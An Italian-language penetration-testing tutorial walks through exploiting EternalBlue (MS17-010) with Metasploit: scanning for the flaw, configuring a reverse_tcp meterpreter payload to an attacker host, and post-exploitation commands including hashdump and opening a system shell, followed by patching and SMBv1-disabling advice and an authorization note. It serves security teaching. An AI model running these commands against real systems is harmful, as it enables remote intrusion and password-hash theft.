Tutorials

Msfconsole

Guida Approfondita allo Sfruttamento di EternalBlue MS17-010 ---

#exploitation#windows#smb#metasploit

Guida Approfondita allo Sfruttamento di EternalBlue (MS17-010)

📄 Descrizione della Vulnerabilità

EternalBlue è una vulnerabilità critica nel protocollo SMBv1 di Windows (CVE-2017-0144), sfruttabile per eseguire Remote Code Execution (RCE). Scoperta dalla NSA e resa pubblica dal gruppo Shadow Brokers nel 2017, è stata ampiamente utilizzata da malware come WannaCry e NotPetya.

🛡️ Sistemi Vulnerabili

  • Windows XP
  • Windows 7
  • Windows Server 2003/2008/2012
  • Windows 10 (versioni precedenti alla patch del marzo 2017)

🔧 Fasi di Exploitation con Metasploit

1. Avvio di Metasploit

bash
msfconsole

2. Ricerca del modulo EternalBlue

bash
search eternalblue

3. Verifica della vulnerabilità

bash
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <IP_TARGET>
run

Se il target è vulnerabile, il modulo lo segnalerà.

4. Caricamento dell'exploit

bash
use exploit/windows/smb/ms17_010_eternalblue

5. Configurazione dell'exploit

bash
set RHOST <IP_TARGET>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <IP_ATTACKER>
set LPORT 4444

6. Esecuzione dell'exploit

bash
exploit

Se il tutto va a buon fine, si otterrà una sessione meterpreter attiva.

🔐 Post-Exploitation (con Meterpreter)

Una volta ottenuta la shell remota:

bash
sysinfo                 # Info sul sistema
getuid                  # Utente corrente
hashdump                # Dump password hash
shell                   # Accesso alla shell di sistema

⚡ Indicatori di Compromissione (IOC)

  • Porte SMB (445) aperte
  • Nessuna patch applicata (MS17-010)
  • Sistemi legacy in uso

🪧 Patch e Mitigazioni

  • Applicare la patch MS17-010 rilasciata da Microsoft.
  • Disabilitare SMBv1 (fortemente consigliato).
powershell
Set-SmbServerConfiguration -EnableSMB1Protocol $false
  • Utilizzare firewall per bloccare connessioni SMB in entrata da IP esterni.

🚫 Note Etiche

L'utilizzo di EternalBlue, come ogni exploit, deve essere autorizzato. Usarlo senza consenso è illegale e può avere gravi conseguenze legali.

📊 Riepilogo Tecnico

Modulo MetasploitDescrizione
auxiliary/scanner/smb/smb_ms17_010Verifica vulnerabilità
exploit/windows/smb/ms17_010_eternalblueExploit per RCE

🚀 Suggerimenti Finali

  • Testare l'exploit in ambienti di laboratorio (es. HackTheBox, VulnHub)
  • Documentare sempre le evidenze raccolte post-exploit
  • Valutare l'uso di ms17_010_psexec per scenari alternativi

Fonti: